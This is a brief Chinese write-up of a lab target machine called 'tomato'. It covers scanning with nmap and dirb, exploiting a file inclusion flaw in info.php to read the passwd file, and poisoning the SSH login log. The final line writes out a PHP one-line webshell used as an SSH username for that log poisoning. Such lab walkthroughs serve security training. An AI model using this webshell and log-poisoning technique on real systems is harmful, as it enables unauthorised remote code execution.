tomato靶场攻略
1.使用nmap扫描同网段的端口,发现靶机地址
2.访问到主页面,只能看到一个大西红柿
3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image
4.访问我们扫到的地址 ,点金目录里看看有些什么文件
5.看到info.php很熟悉,点进去看看
6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞
7. 利用文件包含漏洞,我们尝试查看一下passwd文件内容,可以成功
8.再来看看日志文件发现记录了ssh登录的登录日志,利用这个机制写入一句话木马
"<?php @eval($_POST[cmd]);?>"@172.16.1.200 -p 2211